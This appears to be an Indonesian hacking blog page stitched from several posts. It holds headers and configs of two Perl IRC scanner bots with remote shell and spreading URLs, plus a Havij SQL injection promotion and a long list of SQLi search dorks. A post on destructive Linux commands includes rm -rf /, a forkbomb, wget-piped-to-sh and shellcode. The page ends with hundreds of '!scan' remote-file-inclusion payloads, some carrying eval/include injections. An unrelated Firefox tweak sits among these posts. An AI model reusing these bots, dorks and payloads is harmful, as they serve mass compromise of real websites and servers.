$mail="admin(at)bamby.web.id";
#################################################################################
## 28/05/2010
## Author : BaMbY
## Team : Irc.Konthol.Net
## WebSite : http://www.bamby.web.id
## Contact : admin(at)bamby.web.id
##
## ## IMPORTANT ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR
## # SYSTEM MORE SECURE.
## ##
##
## Features:
## [+]Sql Injection Scanner
## [+]XML (Extensible Markup Language) Injection Scanner
## [+]Remote File Inclusion Scanner
## [+]Local File Inclusion Scanner
## [+]Integrated Shell, so you can execute commands on the server
## [+]Spread Mode, to activate or disable Spread Function
##
#####################################################################################
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;
use HTTP::Request::Common;
use LWP::Simple;
use LWP 5.64;
use HTTP::Request::Common qw(POST);
use Digest::MD5 qw(md5_hex);
use MIME::Base64;
my $fakeproc = "/usr/sbin/apache2 -k homo";
$ircserver = "irc.konthol.net";
my $ircport = "7000";
my $nickname = "Peli";
my $ident = "Ngaceng";
my $channel = "#homo";
my $runner = "BabY";
my $fullname = 'New Scanner Konthol';
my $lfi = "!lfi";
my $xml = "!xml";
my $sql = "!sql";
my $rfi = "!rfi";
my $cmdlfi = "!cmdlfi";
my $cmdxml = "!cmdxml";
my $myste = "http://www.tempat-respon-dan-spreader.com/";


Download [Full+id]

Havij v1.1: Advanced SQL Injection

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.


The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Link For Download

bug SQLi

Nih buat nyari target yang di web nya ada bug SQLi

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:".php?id=1"
inurl:".php?cat=1"
inurl:".php?catid=1"
inurl:".php?num=1"
inurl:".php?bid=1"
inurl:".php?pid=1"
inurl:".php?nid=1"

RFI & LFI scanner

***************************
AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;

$|++;
#######################################################
## CONFIGURATION //
#######################################################

$auth = "arianom";
$authmail = "arianom\@live.it";

my $id = "http://nuthome.net/xe/idosyris.txt??";
my $shell = "http://www.soraperra.com/canazeiinforma/ssh.txt??";
my $ircd = "irc.gotakan.h4ck.la";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick

my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
number, so more speed.
my $rfipidpr0c = 50;


### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "http://www.barcamenando.it/red.txt?";
my $spreadACT = 1; #1 ->disabled, 1 ->enabled
my $securityACT = 0; #1 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode

Download[lengkap + id]

Hack Mozilla firefox, meningkatkan kecepatan internet

Memang kalau cara hack tuh makin lama makin keren saja, banyak sekali yang bisa di hack mulai dari hack kartu kredit sampai ke hack sistem keamanan pentagonpun bisa di bobol hacker. Nah di sini saya tidak akan terlalu jauh bicara hack yang sulit sulit, di sini saya akan memberikan cara hack mozilla firefox untuk meningkatkan kecepatan internet anda biar jauh lebih cepat. Tips mempercepat kecepatan internet ini bukan hanya berlaku untuk komputer pribadi namun bisa juga untuk mempercepat kecepatan internet di warnet. Nah langsung aja deh, ini dia langkah langkah yang harus anda lakukan agar internet anda menjadi lebih cepat, ingat browser yang di gunakan adalah mozilla firefox.

1. Buka Mozilla.

2. Ketikan di addres bar “about:config” (tanpa tanda patik).

3. Scroll mouse anda kebawah dan cari “network.http.max-connections“, double klik dan masukan nilai “64“.

4. Cari “network.http.max-connections-per-server“, double klik dan masukan nilai “21“.

5. Cari ‘network.http.max-persistent-connections-per-server“, double klik dan masukan nilai “8“.

6. Doube klik pada “network.http.pipelining ” menjadi “true“.

7. Cari “network.http.pipelining.maxrequests“, double klik dan masukan nilai “100“.

8. Double klik pada “network.http.proxy.pipelining” menjadi “true“.

9. Langkah terakhir, klik kanan dimana saja pilih : New >> integrar >> lalu tulis “nglayout.initialpaint.delay” (tanpa tanda petik”. Kemudian masukan nilai “0“.

Rasakan segera perbedaannya, kecepatan internet anda akan menjadi was wis wus cepat sekali.:-)

gue udah bukttin, so selamat mencoba bro

Perintah Mematikan di Linux

Linux terkenal karena aspek keamanan penggunaan. Virus yang berteman baik dengan Windows misalnya, harus mencari cara yang sangat rumit untuk bisa menembus Linux.

Meski demikian, dunia yang fana ini (hehehe…) merupakan tempat bagi beragam orang dengan berbagai sifat. Para penjahat dan psikopat bisa saja menyamar di berbagai forum dan mailing list, dan alih-alih memberikan solusi justru bisa membuat anda menderita. Adakalanya perintah-perintah berbahaya di Linux dijadikan sebagai lelucon untuk menggoda (meski berbagai distro memiliki etika dan guiding principle yang melarang lelucon berbahaya) meski ada juga yang memang berniat menjebak orang lain.

Berikut adalah 7 perintah berbahaya yang disarikan dari 7 Deadly Command :

1. Perintah rm -rf /
   Perintah ini akan menghapus seluruh isi folder / (root folder atau root directory). Root folder memang dilindungi oleh hak akses user root, tapi akan sangat berbahaya jika perintah diatas dieksekusi saat kita berada dalam hak akses root. Itulah mengapa sangat dianjurkan untuk menggunakan hak akses user biasa untuk kegiatan sehari-hari.Perintah diatas juga tetap berbahaya jika dijalankan oleh user biasa yang dapat merusak isi folder miliknya sendiri
2. Perintah menggunakan bilangan hexa

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Perintah diatas sama dengan perintah pada nomor 1 hanya saja ditulis dalam bilangan hexa. Jika dieksekusi, sama halnya menghapus seluruh isi folder (rm -rf /). Karena ditulis dalam bilangan hexa, perintah ini bisa juga menjebak user Linux yang berpengalaman

3. Perintah mkfs.ext3 /dev/sda
   Perintah ini sama halnya melakukan perintah format pada partisi yang ditunjuk.
4. Perintah forkbomb :(){:|:&};:
   Perintah ini akan memerintahkan sistem untuk mengeksekusi berbagai proses sampai hang. Biasanya akan mengakibatkan hilangnya data karena komputer terpaksa harus dimatikan secara paksa.
5. Perintah apapun > /dev
   Perintah ini akan menimpa sistem file device yang ditunjuk dan pada akhirnya bisa menyebabkan hilangnya data yang dimounting pada folder /dev (folder /dev biasa digunakan untuk menempatkan keterangan hardware dan harddisk)
6. Perintah untuk eksekusi file shell tertentu
   Perintah wget http://alamat-url-yangtidak-jelas -O- | sh akan memerintahkan Linux untuk langsung menjalankan file sh yang ditunjuk. File sh adalah file eksekusi di Linux, sama halnya file .exe. Jangan sekali-kali melakukan perintah diatas untuk file sh yang tidak jelas sumber dan peruntukannya.
7. Perintah memindahkan home folder ke /dev/null
   mv /home/home-directory/* /dev/null
   Perintah ini akan memindahkan seluruh data di home folder ke file null (file yang sebenarnya tidak ada). File yang dipindahkan akan hilang selamanya tanpa ada backup…

Selain 7 perintah diatas, ada beberapa perintah lainnya yang mungkin belum dimasukkan disini. Prinsip hati-hati dalam menjalankan suatu perintah merupakan hal mutlak yang harus selalu diingat oleh pengguna Linux.

Bug Dork Campur

!scan ///////?cmd&file= "List Users with Pics only?"
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= "BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More."
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement - © 2002-2004 by Christian Scheb - Stylemotion.de
!scan /?installed_config_file= "PhpJobScheduler"
!scan /pjsfiles/modify.php?installed_config_file= "PhpJobScheduler"
!scan errors.php?error= "/com_rwcards" "/com_rwcards"
!scan //vwar/backup/errors.php?error= "errors.php"
!scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= "powered by CMS Made Simple version"
!scan /s_loadenv.inc.php?DOCUMENT_ROOT= "netcat require"
!scan /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path= "php?option=com_rwcards" "php?option=com_rwcards"
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums"
!scan phphtml.php?htmlclass_path= "phphtml.php"
!scan lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= "/adodb_lite" "/adodb_lite"
!scan /?path%5Bdocroot%5D= "/newspublish" "/newspublish"
!scan /?sIncPath= %22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22
!scan errors.php?error= "netcat_files"
!scan /index.php?DOCUMENT_ROOT= "netcat_files"
!scan errors.php?error= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan /?prefix= %22Home%22+%22%7C%22+%22Sell+an+item%22+%22%7C%22+%22Register+now%22+%22%7C%22+%22Login%22+%22%7C%22+%22Help%22+%22%7C%22+%22About+Us%22+%22%7C%22+%22Terms+%26+Conditions%22
!scan ?sIncPath= "powered by boonex"
!scan plugins/safehtml/HTMLSax3.php?dir[plugins]= "powered by boonex"
!scan errors.php?error= "powered by boonex"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "powered by boonex"
!scan errors.php?error= "/ray.3.5" "/ray.3.5"
!scan ?sourcedir= index.php?sourcedir=
!scan errors.php?error= "/com_ponygallery"
!scan /?page= /?pagedb=?
!scan hw3.php?daysonly=0).include($_GET[file]).(0&file= "Current Conditions" "Sun & Moon Information"
!scan /?page= "ArticleBeach"
!scan /tools/send_reminders.php?noSet=0&includedir= includes/php-dbi.php
!scan /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]= "Powered by Orca Interactive Forum Script"
!scan errors.php?error= "Powered by Orca Interactive Forum Script"
!scan /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= "/sohoadmin/"
!scan /?include_path= "guestbook"
!scan /?include_path= "action"+"poll_ident"
!scan /admin/include/lib.module.php?mod_root= "/cmsworks"
!scan errors.php?error= "/com_extcalendar"
!scan /admin/templates/template_thumbnail.php?thumb_template= "Powered by HomePH Design"
!scan /includes/header.php?c_temp_path= "/header.php"
!scan /include/admin.lib.inc.php?site_path= "include/lib.inc.php"
!scan src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT= "/resource/categories"
!scan errors.php?error= "phpkit" "phpkit"
!scan errors.php?error= "/contenido/includes"
!scan popup.php?path= "phpkit" "phpkit"
!scan /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]= "/contenido/includes"
!scan include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]= "/plugins/jrBrowser/"
!scan /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file= /weather/hw3.php/
!scan /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= "com_pollxt"
!scan /ktmllite/includes/ktedit/toolbar.php?dirDepth= "ktmllite" "ktmllite"
!scan errors.php?error= "Subdreamer"
!scan //?custompluginfile%5B%5D= Created by Subdreamer CMS
!scan lostpasswd.php?env[include_prefix]= bookmark4u
!scan /poll/png.php?include_path= "action"+"poll_ident"
!scan /inc/formmail.inc.php?script_root= "Powered By Form Mail Script"
!scan /phpAdsNew/view.inc.php?phpAds_path= "Copyright 2000-2002, PHPAUCTION.ORG"
!scan /authentication/errors.php?error= "phpbb3"
!scan /authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]= /phpbb3/
!scan errors.php?error= "phpRaider"
!scan /poll/booth.php?include_path= "action"+"poll_ident"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Anet"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aorg"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aus"
!scan /orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= "index.php%3Fpr%3D+site%3Aru"
!scan amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 12%22If+you+are+a+registered+member%2C+please+login.+If+you+are+not+registered+yet%2C+please+signup.%22
!scan /admin.php?include_path= "Total Records:" "HTML code is" "guestbook"
!scan /guestbook1//admin.php?include_path= "guestbook1"
!scan poll/booth.php?include_path= "Advanced Poll"
!scan index.php?url= index.php?url=
!scan /galeria.php?start=0&kategoria= /galeria.php?start=0&kategoria=
!scan home.php?index= "home.php?index="
!scan head.php?adresa= head.php?
!scan /poll/png.php?include_path= extcalendar
!scan /includes/db_adodb.php?baseDir= "dotProject logo"
!scan index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid= aid "com_xfaq"
!scan /jscript.php?my_ms[root]= intitle:"myspeach" "chat_exemple.php"
!scan includes/stats.inc.php?prefix= browse.php%3Fid%3D site:com
!scan components/com_sitemap/sitemap.php?mosConfig_admin_path= /component/option,com_sitemap/
!scan /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_= "Powered by Mambo"
!scan includes/useragent.inc.php?prefix= "/browse.php?id="
!scan docs/front-end-demo/cart2.php?workdir= %22hosting.php?pt=r%22 site:au
!scan /include/lib.inc.php?site_path= "lib.inc.php"
!scan /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= "Joomla Component mosDirectory"
!scan /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path= "/includes/joomla.php"
!scan /guestbook/errors.php?error= "Guestbook - Administration"
!scan /index.php?page= index.php%"Submit%Articles"%"Member%Login"%"Top%Authors"
!scan errors.php?error= "powered by TalkBack"
!scan /components/errors.php?error= "com_simpleboard"
!scan /modules/errors.php?error= "/includes/mambo.php"
!scan /errors.php?error= "Joomla Visites"
!scan /modules/Forums/admin/errors.php?error= com_gallery
!scan /include/bbs.lib.inc.php?site_path= "/rgboard/"
!scan /ch_readalso.php?read_xml_include= "Copyrights © 2005 Belgische Federale Overheidsdiensten"
!scan /txt-db-api/txt-db-api.php?API_HOME_DIR= "powered by Crafty Syntax Live Help 2.7"
!scan /dotproject//includes/db_connect.php?baseDir= "dotproject"
!scan modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE= modules/dungeon
!scan /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path= "com_letterman"
!scan /index.php?config=1&base_datapath= wmview.php
!scan errors.php?error= "index"+"of/"+"errors.php"
!scan /accounts/inc/include.php?language=0&lang_settings[0][1]= "powered by Icewarp"
!scan /include/write.php?dir= "/write.php?dir="
!scan /errors.php?error= /errors.php?error=
!scan /components/com_flyspray/startdown.php?file= "/com_flyspray"
!scan /modules/xfsection/modify.php?dir_module= "xfsection" "xfsection"
!scan /common/db.php?commonpath= "samPHPweb" "samPHPweb"
!scan errors.php?error= "samPHPweb" "samPHPweb"
!scan config.inc.php?path_escape= "XZero Community Classifieds" "XZero Community Classifieds"
!scan inc/TabStrip.php?function= "includeTab" "includeTab"
!scan /config.inc.php?path_escape= "Classifieds for our community"
!scan errors.php?error= "Classifieds for our community"
!scan /admin/spaw/spaw_control.class.php?spaw_root= "xt_conteudo" "xt_conteudo"
!scan errors.php?error= "/appserv"
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a= "index.php?name=PNphpBB2"
!scan /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "index.php?name=PNphpBB2"
!scan /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight= "index.php?name=PNphpBB2"
!scan /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= "com_comprofiler" "com_comprofiler"
!scan /includes/mailaccess/pop3.php?CONFIG[pear_dir]= "mailaccess"
!scan /includes/functions_portal.php?phpbb_root_path= "phpbb" "phpbb"
!scan /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "MakeXML4statusCounter.php" "MakeXML4statusCounter.php"
!scan /inc/cmses/aedatingCMS.php?dir%5Binc%5D= "cmses" "cmses"
!scan /import_export/pages/index.inc.php?REX[INCLUDE_PATH]= "Redaxo 2.7.4" "Redaxo 2.7.4"
!scan /faqsupport/samplefaqsupport.php?path[docroot]= "OneAdmin" "OneAdmin"
!scan /ecommerce/payment/cybersource.php?path[docroot]= "ecommerce"
!scan /doceboCms/class/class.dashboard_cms.php?where_framework= "doceboCms" "doceboCms"
!scan /config/dbutil.bck.php?confdir= "/config/dbutil.bck.php"
!scan /config.inc.php?config%5broot_dir%5d= "CLASSIFIEDS"
!scan /claroline/tracking/userLog.php?rootSys= /claroline/ /claroline/
!scan /claroline/phpbb/page_tail.php?includePath= /claroline/ /claroline/
!scan /citywriter/head.php?path= /citywriter/
!scan /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D= /bookmark4u/ /bookmark4u/
!scan /atom.php5?page= "atom.php5?page="
!scan /ashnews.php?pathtoashnews= "pathtoashnews"
!scan /newspublish/include.php?path%5Bdocroot%5D= "newspublish"
!scan /agendax/addevent.inc.php?agendax_path= /agendax/
!scan /PHP_CON/Exchange/include.php?webappcfg[APPPATH]= "PHP-CON v1.3" "PHP-CON v1.3"
!scan /Neos_Chronos/header.php?base_folder= /Neos_Chronos/ /Neos_Chronos/
!scan /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path= "com_chronocontact" "com_chronocontact"
!scan /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]= /mwchat/ /mwchat/
!scan /%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]= "Cecommerce" "Cecommerce"
!scan /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path= /excelwriter/ /excelwriter/
!scan /inc/download_center_lite.inc.php?script_root= "Download Center Lite"
!scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
!scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
!scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
!scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
!scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
!scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
!scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
!scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
!scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
!scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
!scan /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path= "com_magazine"
!scan /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path= "com_lurm_constructor"
!scan /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path= "com_loudmounth"
!scan /index.php?option=com_log&Itemid=&mosConfig_absolute_path= "com_log"
!scan /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path= "com_lmo"
!scan /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path= "com_linkdirectory"
!scan /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path= "com_kochsuite"
!scan /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path= "com_jreactions"
!scan /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path= "com_loudmounth"
!scan /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path= "com_dbquery"
!scan /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path= "com_datsogallery"
!scan /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path= "com_bayesiannaivefilter"
!scan /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR= /xoopsgallery/ /xoopsgallery/
!scan /skin/zero_vote/error.php?dir= "zeroboard"
!scan /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" "/mambots/content/"
!scan /drupal/?_menu[callbacks][1][callback]= "drupal"
!scan /config.inc.php?path_escape= "Powered by SNETWORKS PHP CLASSIFIEDS"
!scan /?mosConfig_absolute_path= "Joomla" "Joomla"
!scan /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]= "index.php?autoLoadConfig"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" net "zeroboard" uk
!scan classes/core/language.php?rootdir= "LimeSurvey"
!scan classes/core/language.php?rootdir= "You have not provided a survey identification number"
!scan PHPDJ_v05/dj/djpage.php?page= allintext:"PHPDJ was created by www.php-mania.co.uk"
!scan /inc/cmses/aedating4CMS.php?dir[inc]= flashchat
!scan /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
!scan index.php?redir= "index.php?redir="
!scan /phpopenchat/contrib/yabbse/poc.php?sourcedir= intitle:PHPOpenChat ext:php
!scan administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "us/index.php?option=com_remository
!scan inc/functions.inc.php?config[ppa_root_path]= "Index - Albums" index.php
!scan inc/cmses/aedatingCMS.php?dir[inc]= "cmses"
!scan phphtml.php?htmlclass_path= phphtml.php
!scan /phpsecurityadmin/include/logout.php?PSA_PATH= "PHPSecurityAdmin"
!scan components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab
!scan /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= "Advanced Poll"
!scan active/components/xmlrpc/client.php?c[components]= "Pindorama"
!scan apps/apps.php?app= WebDesktop
!scan nuseo/admin/nuseo_admin_d.php?nuseo_dir= "NuSEO PHP"
!scan drupal/?_menu[callbacks][1][callback]= Drupal
!scan tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= TikiWiki
!scan administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= com_jcs
!scan administrator/components/com_jcs/view/register.php?mosConfig_absolute_path= com_jcs
!scan components/com_mp3_allopass/allopass.php?mosConfig_live_site= com_mp3_allopass
!scan scan administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path= "com_jcs"
!scan /modules/coppermine/themes/default/theme.php?THEME_DIR= ""Powered by Coppermine"
!scan /default.php?page=home "/default.php?page=home"
!scan /default.php?page= "/default.php?page=home"
!scan /PhpLinkExchange/bits_listings.php?svr_rootPhpStart= PhpLinkExchange
!scan /openi-admin/base/fileloader.php?config[openi_dir]= Powered by OPENi-CMS
!scan /components/com_mp3_allopass/allopass.php?mosConfig_live_site=
!scan /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
!scan index.php?root_path= "powered by Open Bulletin Board"
!scan config.php?fpath= "Powered By PUMA"
!scan /index.php?classified_path= "Vivvo Article Manager"
!scan index.php?base= powered by MyABraCaDaWeb
!scan pop.php?base= powered by MyABraCaDaWeb
!scan extras/ext_cats.php?dir_path= photokorn 1.52
